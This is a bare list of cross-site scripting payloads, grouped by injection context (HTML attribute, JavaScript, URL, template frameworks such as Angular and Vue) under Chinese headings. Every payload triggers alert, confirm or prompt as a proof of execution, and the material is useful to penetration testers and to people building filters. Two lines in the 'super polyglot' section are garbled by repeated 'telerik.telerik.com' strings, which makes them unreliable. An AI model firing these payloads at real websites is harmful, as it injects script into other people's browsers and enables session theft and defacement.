# XSS Polyglot - 多场景通用

# ========== 经典 Polyglot ==========
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//

# ========== 多上下文 Polyglot ==========
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>
"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"><img src="x" onerror="alert(1)">

# ========== JavaScript 上下文 ==========
javascript://'/</title></style></textarea></script>--><p" onclick=alert()>
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>
javascript://</title>"/</textarea></style></script>--><p" onclick=alert()//
'-alert(1)-'
\'-alert(1)//
</script><script>alert(1)</script>

# ========== HTML 属性上下文 ==========
" autofocus onfocus=alert(1) x="
' autofocus onfocus=alert(1) x='
"onmouseover=alert(1)//
'onmouseover=alert(1)//
" onfocus=alert(1) autofocus="
' onfocus=alert(1) autofocus='

# ========== URL 上下文 ==========
javascript:alert(1)//
javascript://%0aalert(1)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

# ========== 短 Polyglot ==========
'"><img src=x onerror=alert(1)>
"><svg onload=alert(1)>
'><script>alert(1)</script>
"><script>alert(1)</script>
</script><script>alert(1)</script>

# ========== 超级 Polyglot (Gareth Heyes) ==========
-->'"/></sCript><deTailS open x]a]a]a]a]a]a]ontoggle=(telerik.telerik.com/telerik.telerik.com.telerik.telerik.comconfirm)``>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&telerik.telerik.com/telerik.telerik.com.telerik.telerik.comlt;telerik.telerik.com/telerik.telerik.com.telerik.telerik.comsvg/telerik.telerik.com/telerik.telerik.com.telerik.telerik.comonload=alert()//>
{{constructor.constructor('alert(1)')()}}

# ========== Angular/Vue/React Polyglot ==========
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
[constructor.constructor('alert(1)')()]
{{_c.constructor('alert(1)')()}}
<div v-html="'<img src=x onerror=alert(1)>'"></div>
